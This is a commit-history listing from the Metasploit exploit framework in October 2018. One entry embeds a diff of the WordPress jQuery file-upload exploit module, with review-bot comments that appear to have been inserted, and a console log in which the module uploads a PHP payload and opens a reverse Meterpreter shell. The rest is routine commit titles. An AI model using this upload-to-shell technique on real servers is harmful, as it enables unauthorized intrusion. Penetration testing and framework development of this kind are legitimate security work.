Commit Graph

13654 Commits

Author SHA1 Message Date
Ivan Racic ee3c663baf Upgraded exploit to work on any Windows target
In short, added egghunter and return address of
the executable file itself, so it should work
on any Windows system.

Also, upgraded to modern exploit module requirements.
2018-10-23 12:11:56 +02:00
William Vu 3d06c10ad0 Link to Apache AllowOverride directive and change 2018-10-23 03:51:16 -05:00
William Vu c9673df3b8 Add WordPress Work The Flow File Upload links
As noted by @bcoles, we have a module exploiting this vuln in #5130,
though it was described as the WordPress plugin and not the asset it had
included. The vuln was "patched" in the plugin by deleting the code.
Somehow this flew under everyone's noses.

msf5 exploit(unix/webapp/wp_worktheflow_upload) > edit
msf5 exploit(unix/webapp/wp_worktheflow_upload) > git diff
[*] exec: git diff

diff --git a/modules/exploits/unix/webapp/wp_worktheflow_upload.rb b/modules/exploits/unix/webapp/wp_worktheflow_upload.rb
index 727c1936f5..2146be49ec 100644
--- a/modules/exploits/unix/webapp/wp_worktheflow_upload.rb
+++ b/modules/exploits/unix/webapp/wp_worktheflow_upload.rb
@@ -50,8 +50,7 @@ class MetasploitModule < Msf::Exploit::Remote
     post_data = data.to_s

     res = send_request_cgi({
-      'uri'       => normalize_uri(wordpress_url_plugins, 'work-the-flow-file-upload', 'public', 'assets',
-                                   'jQuery-File-Upload-9.5.0', 'server', 'php', 'index.php'),
+      'uri'       => '/jQuery-File-Upload/server/php/index.php',
       'method'    => 'POST',
       'ctype'     => "multipart/form-data; boundary=#{data.bound}",
       'data'      => post_data
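Review bot: The `+` line hard-codes an absolute path, `'uri' => '/jQuery-File-Upload/server/php/index.php'`, and drops the normalize_uri call that previously built the URI from wordpress_url_plugins. That is adequate for the one-off local test shown in this message, but if the change were committed the path should be derived from the module's TARGETURI option via normalize_uri(target_uri.path, ...) so the request still works when the uploader is deployed somewhere other than the web root and so the URI is normalized consistently with the rest of the module.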
@@ -70,8 +69,7 @@ class MetasploitModule < Msf::Exploit::Remote

     print_status("Calling payload...")
     send_request_cgi(
-      'uri'       => normalize_uri(wordpress_url_plugins, 'work-the-flow-file-upload', 'public', 'assets',
-                                   'jQuery-File-Upload-9.5.0', 'server', 'php', 'files', php_pagename)
+      'uri'       => "/jQuery-File-Upload/server/php/files/#{php_pagename}"
     )
   end
 end
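Review bot: Same concern as in the first hunk: the `+` line builds the payload URL by string interpolation, `'uri' => "/jQuery-File-Upload/server/php/files/#{php_pagename}"`, rather than through normalize_uri(..., 'files', php_pagename). If this path change were kept, the files/ base should come from the same configured prefix as the upload request above so the two requests cannot drift apart, and normalize_uri should be retained so the generated filename is joined with a single separator.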
msf5 exploit(unix/webapp/wp_worktheflow_upload) > rerun
[*] Reloading module...

[*] Started reverse TCP handler on 172.28.128.1:4444
[+] Our payload is at: rLRFvlAiE.php. Calling payload...
[*] Calling payload...
[*] Sending stage (37775 bytes) to 172.28.128.3
[*] Meterpreter session 1 opened (172.28.128.1:4444 -> 172.28.128.3:54386) at 2018-10-23 03:17:59 -0500
[+] Deleted rLRFvlAiE.php

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : ubuntu-xenial
OS          : Linux ubuntu-xenial 4.4.0-134-generic #160-Ubuntu SMP Wed Aug 15 14:58:00 UTC 2018 x86_64
Meterpreter : php/linux
meterpreter >

Welp.
2018-10-23 03:51:11 -05:00
William Vu a55f7ff30a Clarify vuln (re)discovery vs. disclosure
https://www.bleepingcomputer.com/news/security/jquery-file-upload-plugin-vulnerable-for-8-years-and-only-hackers-knew/
2018-10-23 03:22:45 -05:00
William Vu b4bdc52597 Sort path list by frequency 2018-10-22 23:35:42 -05:00
William Vu dbc0c802d5 Add detection of additional paths 2018-10-22 23:35:42 -05:00
William Vu c4f8b6c937 Add rudimentary check method 2018-10-22 23:35:42 -05:00
William Vu dba7e35819 Refactor slightly with methods
And also check upload response.
2018-10-22 23:35:42 -05:00
William Vu e7ada1a40c Add timeout on payload request
This ensures we don't block on execution.
2018-10-22 23:35:42 -05:00
William Vu 15f14bb295 Add note about Apache .htaccess 2018-10-22 23:35:42 -05:00
William Vu a986a17bb0 Link to @lcashdol's PoC 2018-10-22 23:35:42 -05:00
William Vu 37dbdbf58f Update project URL to PR 2018-10-22 23:35:42 -05:00
William Vu 41721c31fb Add blueimp's jQuery (Arbitrary) File Upload 2018-10-22 23:35:42 -05:00
Green-m c0e8d09802 Add disclosure date. 2018-10-23 09:44:36 +08:00
William Vu 3ca309423a Add check method to detect 4.3BSD fingerd 2018-10-22 18:32:37 -05:00
William Vu 01d11e71db Add Space, BadChars, Encoder, and DisableNops 2018-10-22 18:32:37 -05:00
William Vu fa892d8eba Add Morris worm fingerd stack buffer overflow 2018-10-22 18:32:37 -05:00
Green-m 4711d6ba08 Move post module persistence service to exploit. 2018-10-22 18:07:40 +08:00
William Vu 58a6c4137d Add a better timeout than expect can provide 2018-10-20 13:56:37 -05:00
William Vu a965abaf36 Add full payload support by setting $PATH 2018-10-20 13:56:33 -05:00
William Vu 60c4b87ad1 Prefer expect over sleeping between writes 2018-10-20 13:15:15 -05:00
William Vu ad6f15c8ca Add Morris worm sendmail debug mode exploit 2018-10-20 13:15:01 -05:00
Brendan Coles 7a36056713 Move exploit/qnx/qconn_exec to exploit/qnx/qconn/qconn_exec 2018-10-20 18:16:59 +00:00
William Vu aae74472d2 Land #10817, QNX qconn module rename 2018-10-20 03:10:22 -05:00
Wei Chen 3cee96d8ed Land #10664, add Windows SetImeInfoEx Win32k NULL Pointer Dereference 2018-10-18 14:42:14 -05:00
Wei Chen fac05db154 Update rescue statement 2018-10-18 14:30:20 -05:00
Tim W b3d45586db feedback from code review 2018-10-18 12:30:46 +08:00
Tim W 64e257649f cleanup module 2018-10-18 11:45:59 +08:00
Tim W 290d4428c1 create git mixin 2018-10-18 11:31:31 +08:00
Tim W 063e477ff2 git submodule url exec (CVE-2018-17456) 2018-10-18 11:02:28 +08:00
Brendan Coles a14df8d86e Move exploit/unix/misc/qnx_qconn_exec to exploit/qnx/qconn_exec 2018-10-16 16:21:28 +00:00
Tim W 2e91ec1495 semicolons :) 2018-10-16 14:59:27 +08:00
Tim W 96ba3c636b fix indentation and add author 2018-10-16 14:56:25 +08:00
Tim W 57e2dd2192 send payload url to loader 2018-10-16 14:41:34 +08:00
Shelby Pace 9e069c95f5 add auto targeting 2018-10-15 23:26:08 -07:00
Shelby Pace 6cdfe604d4 removed exception handling for reg_file_for_handle 2018-10-15 18:29:15 -07:00
Wei Chen 8e442cc980 Update documentation 2018-10-15 15:45:39 -05:00
Wei Chen b0313dd25c Update getgodm_http_response_bof for proper auto targets 2018-10-15 15:25:55 -05:00
Wei Chen ff9f3ed9ff Add support for v5 2018-10-15 15:14:12 -05:00
Wei Chen 5433d2cca9 Sync up upstream master 2018-10-15 14:19:07 -05:00
Dhiraj Mishra f78ccbf995 Indentation 2018-10-15 08:32:58 +05:30
h00die 8877582086 Land #10668 rsh stack clash solaris priv esc 2018-10-14 10:34:48 -04:00
Shelby Pace a942654515 rescue-from-method addressed 2018-10-12 14:47:05 -05:00
Shelby Pace 26631bcfbd addressed suggestions 2018-10-12 14:35:42 -05:00
William Vu 5b14d94957 Land #10671, struts2_namespace_ognl updates
There are still some outstanding concerns, but I want to unblock this.
2018-10-12 11:08:33 -05:00
William Vu 2989507b85 Copy check for data_header to avoid crash
Variable was used but out of scope.
2018-10-12 11:06:26 -05:00
Dhiraj Mishra 96eeaf7da3 Made few changes
Thank you bcoles
2018-10-12 11:47:53 +05:30
Shelby Pace a67122aaf7 updated doc, added x86_64 binary 2018-10-11 12:37:51 -05:00
Shelby Pace 521b50af55 added separate binaries, extended for x86 2018-10-11 10:43:35 -05:00
Alex Gonzalez 1da99c8bd1 Fixed syntax errors
Corrected redundant returns and indentation errors
2018-10-11 10:01:47 -04:00